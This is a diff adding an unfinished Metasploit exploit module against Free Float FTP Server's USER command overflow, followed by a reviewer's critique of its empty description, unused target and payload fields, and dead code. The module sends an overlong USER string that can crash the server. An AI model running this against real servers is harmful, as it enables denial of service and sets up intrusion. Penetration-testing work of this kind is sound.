modules/exploits/windows/ftp 1 file changed +64 -0 lines changed
1
+ ##
2
+ # This file is part of the Metasploit Framework and may be subject to
3
+ # redistribution and commercial restrictions. Please see the Metasploit
4
+ # Framework web site for more information on licensing and terms of use.
5
+ # http://metasploit.com/framework/
6
+ ##
7
+
8
+ require 'msf/core'
9
+
10
+ class Metasploit4 < Msf ::Exploit ::Remote
11
+ Rank = LowRanking
12
+
13
+ include Msf ::Exploit ::Remote ::Ftp
14
+
15
+ def initialize ( info = { } )
16
+ super ( update_info ( info ,
17
+ 'Name' => 'Free Float FTP Server USER Command Buffer Overflow' ,
18
+ 'Description' => %q{
19
+ } ,
20
+ 'Platform' => 'win' ,
21
+ 'Author' =>
22
+ [
23
+ 'D35m0nd142' , # Original exploit
24
+ 'Doug Prostko <dougtko[at]gmail.com>' # MSF module
25
+ ] ,
26
+ 'License' => MSF_LICENSE ,
27
+ 'References' =>
28
+ [
29
+ [ 'OSVDB' , '69621' ] ,
30
+ [ 'EDB' , '23243' ]
31
+ ] ,
32
+ 'Privileged' => false ,
33
+ 'Payload' =>
34
+ {
35
+ 'Space' => 500 ,
36
+ #'DisableNops' => true,
37
+ #'BadChars' => "\x00\x0a\x0d\x20\x5c",
38
+ #'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
39
+ } ,
40
+ 'Targets' =>
41
+ [
42
+ [ 'Windows XP SP3' ,
43
+ {
44
+ 'Ret' => 0x7E379353 , # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
45
+ 'Offset' => 228
46
+ }
47
+ ] ,
48
+ ] ,
49
+ 'DefaultTarget' => 0 ,
50
+ 'DisclosureDate' => 'Jun 12 2012' ) )
51
+ register_options (
52
+ [
53
+ #OptAddress.new('SOURCEIP', [false, 'The local client address'])
54
+ ] , self . class )
55
+ end
56
+
57
+ def exploit
58
+ connect
59
+ buf = pattern_create ( 300 )
60
+ send_cmd ( [ 'USER ' , buf ] , false )
61
+ disconnect
62
+ end
63
+
64
+ end
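Review bot: The `'Description'` field is committed empty (`%q{ }`), so the module never states which Free Float FTP Server build is affected or what the USER command overflow is; it needs a short paragraph covering both. As written, `exploit` only sends `pattern_create(300)` and disconnects, never reading `target['Offset']`, `target['Ret']` or the payload, so this is a crash test sitting under a `Targets`/`Payload` block it does not use; it should be labelled work in progress in the description or held back until complete. The `'Ret'` comment places the address in `C:\Program Files\PMSystem\Temp\tmp0.dll`, which does not look like part of the FTP server or of Windows, so the `'Windows XP SP3'` target name appears to overstate where the entry applies. The commented-out `DisableNops`, `BadChars`, `PrependEncoder` and `SOURCEIP` lines and the empty `register_options([], self.class)` call are dead code and can be dropped.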